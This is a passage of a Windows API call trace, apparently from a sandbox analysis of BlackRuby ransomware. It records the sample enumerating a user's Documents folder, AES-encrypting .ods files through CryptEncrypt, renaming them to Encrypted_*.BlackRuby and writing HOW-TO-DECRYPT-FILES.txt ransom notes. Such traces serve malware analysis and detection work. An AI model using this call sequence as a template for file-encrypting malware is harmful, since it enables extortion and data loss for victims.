CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4ca78*, pdwDataLen=0x18ebdc*=0x10, dwBufLen=0x10 | out: pbData=0x1c4ca78*, pdwDataLen=0x18ebdc*=0x10) returned 1 [0058.745] GetLastError () returned 0x0 [0058.745] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4caa8*, pdwDataLen=0x18ebe4*=0x0, dwBufLen=0x10 | out: pbData=0x1c4caa8*, pdwDataLen=0x18ebe4*=0x10) returned 1 [0058.745] GetLastError () returned 0x0 [0058.746] CryptDestroyKey (hKey=0x360ea0) returned 1 [0058.746] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.746] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.746] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.746] GetLastError () returned 0x0 [0058.746] SetErrorMode (uMode=0x1) returned 0x0 [0058.746] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.747] GetLastError () returned 0xb7 [0058.747] GetFileType (hFile=0x184) returned 0x1 [0058.747] SetErrorMode (uMode=0x0) returned 0x1 [0058.747] GetFileType (hFile=0x184) returned 0x1 [0058.749] CloseHandle (hObject=0x184) returned 1 [0058.749] GetLastError () returned 0xb7 [0058.749] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.749] GetLastError () returned 0xb7 [0058.749] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_A7cC85N9CdtF5LTDQlkOL3MOgjmP3j3b9jrEuDnzRRm2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_A7cC85N9CdtF5LTDQlkOL3MOgjmP3j3b9jrEuDnzRRm2.BlackRuby", lpFilePart=0x0) returned 0x92 [0058.749] GetLastError () returned 0xb7 [0058.749] SetErrorMode (uMode=0x1) returned 0x0 [0058.749] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ec24 | out: lpFileInformation=0x18ec24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8332030, ftCreationTime.dwHighDateTime=0x1d353e7, ftLastAccessTime.dwLowDateTime=0xa1dcafd0, ftLastAccessTime.dwHighDateTime=0x1d349fb, ftLastWriteTime.dwLowDateTime=0x2b354a40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12950)) returned 1 [0058.749] GetLastError () returned 0xb7 [0058.749] SetErrorMode (uMode=0x0) returned 0x1 [0058.750] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_A7cC85N9CdtF5LTDQlkOL3MOgjmP3j3b9jrEuDnzRRm2.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\encrypted_a7cc85n9cdtf5ltdqlkol3mogjmp3j3b9jreudnzrrm2.blackruby")) returned 1 [0058.750] GetLastError () returned 0xb7 [0058.750] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6a [0058.750] GetLastError () returned 0xb7 [0058.750] SetErrorMode (uMode=0x1) returned 0x0 [0058.750] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.751] GetLastError () returned 0x5 [0058.751] SetErrorMode (uMode=0x0) returned 0x1 [0058.751] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", lpFilePart=0x0) returned 0x5f [0058.752] GetLastError () returned 0x5 [0058.752] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.752] GetLastError () returned 0x5 [0058.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.752] GetLastError () returned 0x5 [0058.752] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", lpFilePart=0x0) returned 0x5f [0058.752] GetLastError () returned 0x5 [0058.752] SetErrorMode (uMode=0x1) returned 0x0 [0058.752] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.752] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.752] GetLastError () returned 0x5 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x5 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x5 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.753] GetLastError () returned 0x12 [0058.753] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0058.753] SetErrorMode (uMode=0x0) returned 0x1 [0058.753] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i", lpFilePart=0x0) returned 0x5f [0058.753] GetLastError () returned 0x12 [0058.753] SetErrorMode (uMode=0x1) returned 0x0 [0058.753] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.753] GetLastError () returned 0x12 [0058.753] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.753] GetLastError () returned 0x12 [0058.753] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0058.754] SetErrorMode (uMode=0x0) returned 0x1 [0058.754] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.754] GetLastError () returned 0x12 [0058.754] SetErrorMode (uMode=0x1) returned 0x0 [0058.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), fInfoLevelId=0x0, lpFileInformation=0x1c7f348 | out: lpFileInformation=0x1c7f348*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224d39d0, ftCreationTime.dwHighDateTime=0x1d34b11, ftLastAccessTime.dwLowDateTime=0xf3618a40, ftLastAccessTime.dwHighDateTime=0x1d35673, ftLastWriteTime.dwLowDateTime=0xf3618a40, ftLastWriteTime.dwHighDateTime=0x1d35673, nFileSizeHigh=0x0, nFileSizeLow=0xcc3b)) returned 1 [0058.754] GetLastError () returned 0x12 [0058.754] SetErrorMode (uMode=0x0) returned 0x1 [0058.754] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.754] GetLastError () returned 0x12 [0058.754] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.754] GetLastError () returned 0x12 [0058.754] SetErrorMode (uMode=0x1) returned 0x0 [0058.754] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.754] GetLastError () returned 0x0 [0058.754] GetFileType (hFile=0x184) returned 0x1 [0058.754] SetErrorMode (uMode=0x0) returned 0x1 [0058.754] GetFileType (hFile=0x184) returned 0x1 [0058.754] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xcc3b [0058.754] GetLastError () returned 0x0 [0058.754] ReadFile (in: hFile=0x184, lpBuffer=0x1c812b4, nNumberOfBytesToRead=0xcc3b, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c812b4*, lpNumberOfBytesRead=0x18eb68*=0xcc3b, lpOverlapped=0x0) returned 1 [0058.755] GetLastError () returned 0x0 [0058.755] CloseHandle (hObject=0x184) returned 1 [0058.755] GetLastError () returned 0x0 [0058.755] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.755] GetLastError () returned 0x0 [0058.755] SetErrorMode (uMode=0x1) returned 0x0 [0058.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224d39d0, ftCreationTime.dwHighDateTime=0x1d34b11, ftLastAccessTime.dwLowDateTime=0xf3618a40, ftLastAccessTime.dwHighDateTime=0x1d35673, ftLastWriteTime.dwLowDateTime=0xf3618a40, ftLastWriteTime.dwHighDateTime=0x1d35673, nFileSizeHigh=0x0, nFileSizeLow=0xcc3b)) returned 1 [0058.756] GetLastError () returned 0x0 [0058.756] SetErrorMode (uMode=0x0) returned 0x1 [0058.756] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0058.756] GetLastError () returned 0x0 [0058.791] CryptImportKey (in: hProv=0x37c818, pbData=0x1cf4f5c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b20) returned 1 [0058.791] GetLastError () returned 0x0 [0058.791] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.791] GetLastError () returned 0x0 [0058.796] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.796] GetLastError () returned 0x0 [0058.796] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ae0) returned 1 [0058.796] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.796] GetLastError () returned 0x0 [0058.796] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1d21fa8*=0x1, dwFlags=0x0) returned 1 [0058.796] GetLastError () returned 0x0 [0058.796] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1d21f74, dwFlags=0x0) returned 1 [0058.796] GetLastError () returned 0x0 [0058.796] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d21ff0*, pdwDataLen=0x18eb58*=0xcd30, dwBufLen=0xcd30 | out: pbData=0x1d21ff0*, pdwDataLen=0x18eb58*=0xcd30) returned 1 [0058.797] GetLastError () returned 0x0 [0058.797] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d3ba7c*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1d3ba7c*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.797] GetLastError () returned 0x0 [0058.797] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d3baac*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1d3baac*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.797] GetLastError () returned 0x0 [0058.797] CryptDestroyKey (hKey=0x360b20) returned 1 [0058.797] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.797] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.797] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.797] GetLastError () returned 0x0 [0058.797] SetErrorMode (uMode=0x1) returned 0x0 [0058.797] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.798] GetLastError () returned 0xb7 [0058.798] GetFileType (hFile=0x184) returned 0x1 [0058.798] SetErrorMode (uMode=0x0) returned 0x1 [0058.798] GetFileType (hFile=0x184) returned 0x1 [0058.800] CloseHandle (hObject=0x184) returned 1 [0058.800] GetLastError () returned 0xb7 [0058.800] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods", lpFilePart=0x0) returned 0x6e [0058.800] GetLastError () returned 0xb7 [0058.800] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_f95eBIzvR46YqRphUS9logMZCuonlzdwijbQq1ZLxUu.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_f95eBIzvR46YqRphUS9logMZCuonlzdwijbQq1ZLxUu.BlackRuby", lpFilePart=0x0) returned 0x9f [0058.800] GetLastError () returned 0xb7 [0058.800] SetErrorMode (uMode=0x1) returned 0x0 [0058.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224d39d0, ftCreationTime.dwHighDateTime=0x1d34b11, ftLastAccessTime.dwLowDateTime=0xf3618a40, ftLastAccessTime.dwHighDateTime=0x1d35673, ftLastWriteTime.dwLowDateTime=0x2b3ecfc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xcd40)) returned 1 [0058.800] GetLastError () returned 0xb7 [0058.800] SetErrorMode (uMode=0x0) returned 0x1 [0058.800] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\2X0Tuszfkv.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\2x0tuszfkv.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_f95eBIzvR46YqRphUS9logMZCuonlzdwijbQq1ZLxUu.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_f95ebizvr46yqrphus9logmzcuonlzdwijbqq1zlxuu.blackruby")) returned 1 [0058.800] GetLastError () returned 0xb7 [0058.803] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0058.803] GetLastError () returned 0xb7 [0058.803] SetErrorMode (uMode=0x1) returned 0x0 [0058.803] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.804] GetLastError () returned 0x0 [0058.804] GetFileType (hFile=0x184) returned 0x1 [0058.804] SetErrorMode (uMode=0x0) returned 